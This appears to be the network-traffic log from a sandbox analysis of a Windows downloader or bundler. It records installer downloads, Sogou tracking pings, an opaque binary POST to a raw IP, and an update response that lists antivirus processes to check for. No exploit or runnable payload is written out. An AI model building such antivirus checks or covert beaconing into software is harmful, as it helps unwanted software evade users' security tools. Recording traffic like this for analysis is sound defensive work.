<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /invc/xfspeed/qqpcmgr/download/SuiteDownloader20160222153349.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dlied6.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nws_4.2.1_midcache
Last-Modified: Mon, 22 Feb 2016 07:33:50 GMT
Content-Type: application/octet-stream
Content-Length: 2713888
X-Cache-Lookup: Hit From Disktank
Cache-Control: max-age=600
Expires: Thu, 19 May 2016 07:23:08 GMT
Date: Thu, 19 May 2016 07:13:08 GMT
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........p.........
.....nc......np......ns.....f.C..............nl......nb......nf.....Ri
ch............................PE..L...W .V.....................`(.....
G0............@..........................`)......$*...................
......................x....P..,.(..........P). .......................
........................@............................................t
ext...X........................... ..`.rdata..h/.......0..............
....@[email protected]........ ... ... [email protected]...,.(..P....(..@
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8660251-8701287
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXh0000o30f--&unc=sogousoftware_normal&t=10&rand=1463641970 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:45 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2467523-3168363
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:30 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5912222
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5854764-11709527
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:20 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0 HTTP/1.1
User-Agent: HttpRequest
Host: t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Ruleid: 54d3460c179ca2b2069ae8f3
2b6....[.A.p.p.l.i.c.a.t.i.o.n.D.o.w.n.l.o.a.d.].....P.c.i.d.L.i.s.t.=
.1.2.9.7.9.4.2.4.2.5.3.3.7.0.8.2.7.4.,.-.8.5.0.8.4.0.3.4.1.8.9.0.2.1.1
.8.0.7.8.,.5.7.7.6.6.5.4.4.1.8.0.3.2.3.7.2.9.3.7.,.2.0.4.0.6.8.3.5.3.5
.5.0.5.1.0.4.7.4.9.,.-.1.5.3.5.1.7.7.8.6.7.9.6.8.9.6.2.7.5.5.,.2.1.9.9
.4.3.5.4.9.5.5.3.7.6.6.3.8.5.4.,.8.6.2.3.3.0.8.8.6.5.1.2.8.8.0.9.0.5.1
.....N.a.m.e.L.i.s.t.=.3.6.0..[hQkS.X,[email protected],.3.6.0..g..Om..hV,.3
.6.0..[hQOm..hV,.3.6.0.Kb:g.RKb5u..Hr,.~v.^kS.X,..d.rOm..hV....[.A.p.p
.l.i.c.a.t.i.o.n.R.u.n.].....P.r.o.c.e.s.s.L.i.s.t.=.3.6.0.T.r.a.y...e
.x.e.,.3.6.0.s.d...e.x.e.,.3.6.0.c.h.r.o.m.e...e.x.e.,.3.6.0.s.e...e.x
.e.,.3.6.0.M.o.b.i.l.e.M.g.r...e.x.e.,.B.a.i.d.u.A.n.T.r.a.y...e.x.e..
.0......


GET /update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1 HTTP/1.1


User-Agent: HttpDownload
Host: t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3
54d3460c179ca2b2069ae8f3<br/>HTTP/1.1 200 OK..Server: nginx..Dat
e: Thu, 19 May 2016 07:13:07 GMT..Content-Type: text/html..Content-Len
gth: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.3..54d3460c179ca
2b2069ae8f3<br/>....


GET /update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0 HTTP/1.1


User-Agent: HttpRequest
Host: t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Ruleid: 54d3460c179ca2b2069ae8f3
2b6....[.A.p.p.l.i.c.a.t.i.o.n.D.o.w.n.l.o.a.d.].....P.c.i.d.L.i.s.t.=
.1.2.9.7.9.4.2.4.2.5.3.3.7.0.8.2.7.4.,.-.8.5.0.8.4.0.3.4.1.8.9.0.2.1.1
.8.0.7.8.,.5.7.7.6.6.5.4.4.1.8.0.3.2.3.7.2.9.3.7.,.2.0.4.0.6.8.3.5.3.5
.5.0.5.1.0.4.7.4.9.,.-.1.5.3.5.1.7.7.8.6.7.9.6.8.9.6.2.7.5.5.,.2.1.9.9
.4.3.5.4.9.5.5.3.7.6.6.3.8.5.4.,.8.6.2.3.3.0.8.8.6.5.1.2.8.8.0.9.0.5.1
.....N.a.m.e.L.i.s.t.=.3.6.0..[hQkS.X,[email protected],.3.6.0..g..Om..hV,.3
.6.0..[hQOm..hV,.3.6.0.Kb:g.RKb5u..Hr,.~v.^kS.X,..d.rOm..hV....[.A.p.p
.l.i.c.a.t.i.o.n.R.u.n.].....P.r.o.c.e.s.s.L.i.s.t.=.3.6.0.T.r.a.y...e
.x.e.,.3.6.0.s.d...e.x.e.,.3.6.0.c.h.r.o.m.e...e.x.e.,.3.6.0.s.e...e.x
.e.,.3.6.0.M.o.b.i.l.e.M.g.r...e.x.e.,.B.a.i.d.u.A.n.T.r.a.y...e.x.e..
.0......


GET /update_platform/done.php?v=1.0.0.0&appname=sogoudownload_bindsecontrol&state=1 HTTP/1.1


User-Agent: HttpDownload
Host: t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3
54d3460c179ca2b2069ae8f3<br/>HTTP/1.1 200 OK..Server: nginx..Dat
e: Thu, 19 May 2016 07:13:09 GMT..Content-Type: text/html..Content-Len
gth: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.3..54d3460c179ca
2b2069ae8f3<br/>..



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5971727
Referer: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8782146-11709527
Referer: hXXp://112.5.251.214/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



POST / HTTP/1.1
Host: 163.177.79.152:80
Content-type: application/octet-stream
Content-Length: 92
Connection: Keep-Alive

<.......P...|...(...TLQ.j....W.......{..`t.\.V.{>X.G........P..`.Q'.}....!/.....<...I53....
HTTP/1.1 200 OK
Content-Length: 60
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 60..Content-Type: application/octet-s
tream..Connection: Close..<.......0.......F...!..../70.~X.o.a!..yI.
....... .(.U..f..ed..



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=7220069-7373409
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:38 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8508097-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: application/octet-stream
Content-Length: 3201431
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8508097-11709527/11709528
!H..3.o.}..$....6I..>.7.7...T2......p...f.S.fWK(....'..(..}.pU...R.
.3....U.0.0.Xl.<..'8xm.%..9-.H..1.....$G\.>~N.BX.L.N.6....|$....
,..#=.\#..s............G&.L_...m..697.....fY.......k.3..>i..U...w..
....../ (mp....NqZ.......Z....&...)...=.8...KhH[.....;...m..lo7...Hyd.
:Ft...#....AB.0.a......q..^.&...^..0.&..K...(.p.Z}.4...CCC...[......St
..C......6.b=.f.i.>..K.....'Q..Y....... g..a.C).U...J-...0h./9.)...
...JR...<2..]. .AE....'.a7.<&.o..B:bE2>......L.~....`.,..9..8
:l$......9.~W...;,9'...4......R2.W....p.3..Q........`Q..].>..^.....
y.....:..n...t1.".D.........R..j`.R.f.Ri.D;...c..?..J. ...G..7|`......
i.....K.q}Q....y.Z.}~l.\...,....6..K>Cn.......E.;....W.y..(..P{-;..
T.`........8:..s....%u..R.......N...x......B..t.f.{.......Dq...O...:..
.w.....A.|Tu.1.(...T..DX.t..........S< ..nL)D..3.=.:..sK...6.8...J.
...%oK....... . t.1..../9.e....?l...n_~..q..s.Y.D`..h.`q._...,...../..
-4.h.........>.$U....o....i..... .. :.R.`.....5.6V../n......K...n..
...1..C........q.q)3.*b&^.\C...A...t.>..%...[...6z...F.......) ....
b^1o........[k.........S-...H.......u^p..5|U\8.*..B.Y...v....G..5..Wnp
k8x.P.[..[.'......7,....#........]9.-.z.KJ.Js.G........o...P..........
<.....(.M.t.*.......T.WW..,.B"H.K.....Y...?k.|L.3....=.X]<..!...
...UI.=...X..].5..1sJ...;.j./.R.<[email protected]|........f.B....~.
..6W........a.b.....s. .o...`> .....qT.;..6.....o.3...R.M}.eO.)....
(h..n).r.......s..X.5....X.OC.VOM..E.>)/.-...!FR]w.).PE^..C.*9<.
a-]k3h..X....(i...Z...c.....8.AP..t,.e...]}c..:.#]i.....l.s...(...
<<< skipped >>>


GET /net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/yijianchongzhuang_745x240.png&r= HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:14 GMT
Content-Type: image/png
Content-Length: 36851
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 07:40:45 GMT
Expires: Thu, 19 May 2016 07:40:45 GMT
Cache-Control: max-age=86400
ETag: f579abb9bd3bb8df8050ced8c867fffc
X-YunTu-Cache: HIT
X-Yuntu-Trace: tc_48_75
X-Yuntu-Trace-Proxy: sjs_86_87
[email protected]......,......gAMA......a.... cHRM..z&.........
.....u0...`..:....p..Q<....bKGD..............tIME......0x.......IDA
Tx...w.fUy/.}.Z....2s..P..:..XPD.XP.DMLL,.kbL..c.i7..{..cCP.....Nez=..
u.....c....f.|~....9......=.E..... <.F.j.g'.....I...z....!Q.1.i....
..= D...3.@`..L.2..[..RX.=C.07.YJX.....X.....$..R..Yn0..PE.z.~.....c..
.....=.B3 A....5.b......M3. x!.J43gI..`p...<..,.li.....^.I....i...&
gt;.`0C.T(.:.$...k..O..^e.z....F...B..Q.hn......(,R P.. @.1\..k..,%.a.
G4c.Sv...E(..\.fCe...>.V.d....b.j...4@.@.?E..c..b.%P......0.._....,
.....K0..Y.u. ...Q.X.Y'.CO..M3...P...l..........F..B.......Y.0....!1;a
../>...yT..B..k..D.Mn....GEe.M.^...wH...`..-.^R....)a..C.-.3.D....T
.).S&...OU.."b.^.T.hL$B..fk.<......]d...B..pl@ By.X..g....B_ H.f.B.
.lmq...:.%$H0.\.....3JE..d."[email protected].#..yM.P.'H
...'H.N..@...|....([email protected]$.p{.......k.|..9..a..2Y.e.1
.aa...).......X3..[d..b.W........W..0%..7ewK......l9.-..D ....E.`nM...
b.eX..s~.2..d...........n<......Orw.z..-....;.l.6.(@...g.7..9s.....
.l{S..{........&..X..Z.4........Ct..........>.._Z...P.%&T*........5
..........%AP.=..8..`. &_.y....Z.'.1.!..H.H ....Kq..A.R.h...I.M....$b.
@.. .48.,L........0.Y..aRf7G....;v...e....$l..1 ....u...l"....Sp.4.Ckb
.)...D.6y..Ov.#.f..$lS...#... <R...1...QP .....;...C"./.,...m.....@
C...I...P:.#.&l.........*..(...X..lSk5.hl1... .[6...V3.....|.|.O. ...k
.3r.Z.(s....c....\..N.B.......2e.u....M..b...X.[z"....(.d..*.j..O|.`..
"....K.jU..T*[email protected]..`j4./...l.Q.6.y9.:...^. ...I...Bz...
<<< skipped >>>


GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3080605666447722537.png&r=null HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: image/png
Content-Length: 22286
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:28:09 GMT
Expires: Thu, 19 May 2016 13:28:09 GMT
Cache-Control: max-age=86400
ETag: 23f52995ff0ca2894451bafb3013b425
X-YunTu-Cache: HIT
X-Yuntu-Trace: sjs_45_69
X-Yuntu-Trace-Proxy: sjs_86_87
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME..........\..U.IDATx...y.eWY..{.....\[email protected]
.Q[[.U...vh.EP.Vh@@..B...1.2.5Ow.g.{..~..}.=.R.T........{....{..].<
..?...l.z...`....7G..8...n.....f.D.7Z...;t.......d?........8w..1......
l....4....;T.6E'......?......r..,Y.OIq..},92........!.....".y..&`lt<
;\^]z...y..4.rEw)[email protected]..'d..5......#!..(...e.k.
..P)Uj...H.$h.[Wy....{..n1b.X.....#.k..1...AU...(.{....7.;q.P<:..d 
_.>,.?x..."JA}.$D8.d/.#......~.3..o.Uc.t........^f.%.bJq.(..0.A...x
.q....U.9...5......j.......Y...... [email protected]^D..G...oED....M..o....
..q\........L`\.I...^.K.e8..:.k...E..B.E>.....L...{.Sud..k.p......'
.)..E.2.7 .|."...^D...S.UU.3.e?....T.:5...k...i.[..M:..i..........y..s
[email protected]}....K ....0D...e.oJ...e'....#"X.z..u..?t..[.Wuvv....`.{Y
YY...B...g..>...X..z...!...|>...0b..e..3....Y.....K..k..7...M..9
....A..w5U.=...7.....~...b.5 ..,//..v......>.;..l.......g..m..c0.. 
N3.H.x.........DY...9..>..0<N.~`.u.....#.K^V.O../x..3.l/I...yV..
.s}............~.9.....3F0b......1..@. .T..../T.....x........_D..c..~.
s.....M..d........H.......v..W....9w.vvz6............{..|F... 7....`.:
.<...<.K<..e.N.)..~.T.'.K.g......n..O.2....<.V......K..C..
%..;...k.<.=.U...#.....!..k.O....?......O..?...e...#.:U..,K.8..z.e/
......F......a.-T3.D{..NNz?t..>.z%...pT.$-B.{.k. .A`s$..|....X..[..
..R.`..].v4.".c.9.....w.e.7c.3fii...........'ix..rZl..8`3./.!.....
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6542522661282298716.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRanking
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: image/png
Content-Length: 18169
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 02:14:29 GMT
Expires: Fri, 20 May 2016 02:14:29 GMT
Cache-Control: max-age=86400
ETag: 623d9db4f277757aee2d421986881593
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_124_20
X-Yuntu-Trace-Proxy: tc_196_98
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME..........v..E.IDATx...{.e.U..[{.s.w...............HHH.I.2......
PbG._.6I%!.....*\..I..qR.8q...?.0I.....BB<,..B..i4.I..~...8g..?.^{.
}...=..U.....{.....Z...k...._Dz..........E|..'.......>.. r. .......
-.~.w..@. "[email protected].}o.k...w...O..7...7^.w../?...|
.."....!....[.....^q.0......;,....9.x"8.....w..g.../<..[.=..u..q...
{....?m..q^......>..<...../.D.......wn......9.............=..#..
....rt...........%\z...}..NG..........=.4.8.M.:...6.|....M..x....7....
...y.......m....g.s..=.#.s "....G.w.fq,. |.......\.!...D|.~C.. pM....N
(,CX....^.?}.b. p...........%..,`Daa.D.v.@8~...!}....z..Y.>.A.#....
...#......80..&S.G.......h.\....O....y.s....?i ].(.F...>..}........
u.....;w..3.{./`.x......w.....iP...i....]{..m<......i..>..=v&...
...q...{.9K..?..p..........h.....`...`[email protected]. .[.9wK..
g...?.....N.........'..<....7q........3......'t......:G...6...._-.o
>\.|.~.W......u.P....1...=...........4P......%[email protected]'....p.._..S.B
....c?u..}........|.......{.......p."E.0 .wA.....|...c........._..7.@.
.)...A(..I.....$............ }.l..^.@`...=3:...B/...B..0..F`.aA...0C..
...@...#tA....v6w...`.=...?...O.....]h#.H..E..*.6..X.Id..4./...8|j7..|
.S.(=~a.....9r.8`.y?.m......o{..<.n.g....y6...[.w...x... ... .;.w..
..p..m......;.....d......"m..M...G.......o.a....#..&.oU..I,.D./.-f.%.t
.~...!C.l.<'.......X....1k0m....n..|$<.........tC.6.........
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3080605666447722537.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: image/png
